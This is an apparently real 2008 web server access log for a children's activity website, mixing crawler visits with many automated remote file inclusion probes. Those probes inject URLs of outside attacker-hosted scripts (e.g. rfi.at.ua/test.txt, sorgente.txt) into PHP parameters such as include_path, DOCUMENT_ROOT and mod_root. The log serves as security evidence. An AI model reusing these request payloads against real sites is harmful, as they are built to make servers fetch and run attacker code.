85.98.224.200 - - [21/Nov/2008:03:39:33 -0700] "GET /images/adimages/healthadvenrainad.jpg HTTP/1.1" 304 - www.wnckids.com "http://www.wnckids.com/oldcalendars/calendarmay06.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; UGESF 1.6.7.0)" "-"
38.103.63.57 - - [21/Nov/2008:03:41:10 -0700] "GET /oldcalendars/calendarjuly.htm HTTP/1.1" 200 128294 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
211.202.2.220 - - [21/Nov/2008:03:42:16 -0700] "GET /logs/access_log.old//modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
211.202.2.220 - - [21/Nov/2008:03:42:29 -0700] "GET /logs/access_log.old//modules/xfsection/modify.php?dir_module=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
38.103.63.57 - - [21/Nov/2008:03:46:24 -0700] "GET /wwwstat/2006.Sep.usage.html HTTP/1.1" 200 10943 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
94.229.68.13 - - [21/Nov/2008:03:51:17 -0700] "GET /logs/access_log.old/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=linarie.com/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
38.103.63.57 - - [21/Nov/2008:03:52:09 -0700] "GET /wwwstat/2007.Feb.usage.html HTTP/1.1" 200 9550 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
38.103.63.57 - - [21/Nov/2008:03:56:19 -0700] "GET /images/funfair/ HTTP/1.1" 200 4528 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
38.103.63.57 - - [21/Nov/2008:04:00:37 -0700] "GET /wwwstat/2005.Oct.usage.html HTTP/1.1" 200 9021 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
219.85.63.226 - - [21/Nov/2008:04:03:58 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
219.85.63.226 - - [21/Nov/2008:04:03:58 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
219.85.63.226 - - [21/Nov/2008:04:03:58 -0700] "GET /logs/access_log//index.php?DOCUMENT_ROOT=http://www.efeyl.org/wiki/backups/sp.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
38.103.63.57 - - [21/Nov/2008:04:04:33 -0700] "GET /images/animalsinsects/ HTTP/1.1" 200 988 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
38.103.63.57 - - [21/Nov/2008:04:07:26 -0700] "GET /wwwstat/Aug.usage.html HTTP/1.1" 200 11186 www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
83.2.108.2 - - [21/Nov/2008:04:09:50 -0700] "GET /errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
83.2.108.2 - - [21/Nov/2008:04:09:50 -0700] "GET /logs/errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
221.12.138.78 - - [21/Nov/2008:04:10:32 -0700] "GET //admin/include/lib.module.php?mod_root=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "-"
221.12.138.78 - - [21/Nov/2008:04:10:32 -0700] "GET /logs//admin/include/lib.module.php?mod_root=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "-"
87.66.0.221 - - [21/Nov/2008:04:11:22 -0700] "GET /logs/errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "-"
87.66.0.221 - - [21/Nov/2008:04:11:22 -0700] "GET /errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "-"
38.103.63.57 - - [21/Nov/2008:04:11:24 -0700] "GET /parkspools.htm HTTP/1.1" 404 - www.wnckids.com "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "-"
211.76.137.5 - - [21/Nov/2008:04:12:02 -0700] "GET //?include_path=http://rfi.at.ua/test.txt?? HTTP/1.1" 200 1047 www.wnckids.com "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "-"
83.2.108.2 - - [21/Nov/2008:04:13:35 -0700] "GET /logs/errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
83.2.108.2 - - [21/Nov/2008:04:13:35 -0700] "GET /errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "-"
87.106.245.44 - - [21/Nov/2008:04:14:09 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:04:14:09 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [21/Nov/2008:04:14:09 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
211.76.137.5 - - [21/Nov/2008:04:14:19 -0700] "GET /errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "-"
211.76.137.5 - - [21/Nov/2008:04:14:19 -0700] "GET /logs/errors.php?error=http://rfi.at.ua/test.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "M